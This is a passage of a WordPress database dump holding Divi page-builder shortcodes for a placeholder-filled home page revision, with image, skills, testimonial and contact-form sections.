_builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:06:48','2020-08-07 20:06:48','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(586,1,'2020-08-07 20:07:11','2020-08-07 20:07:11','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" 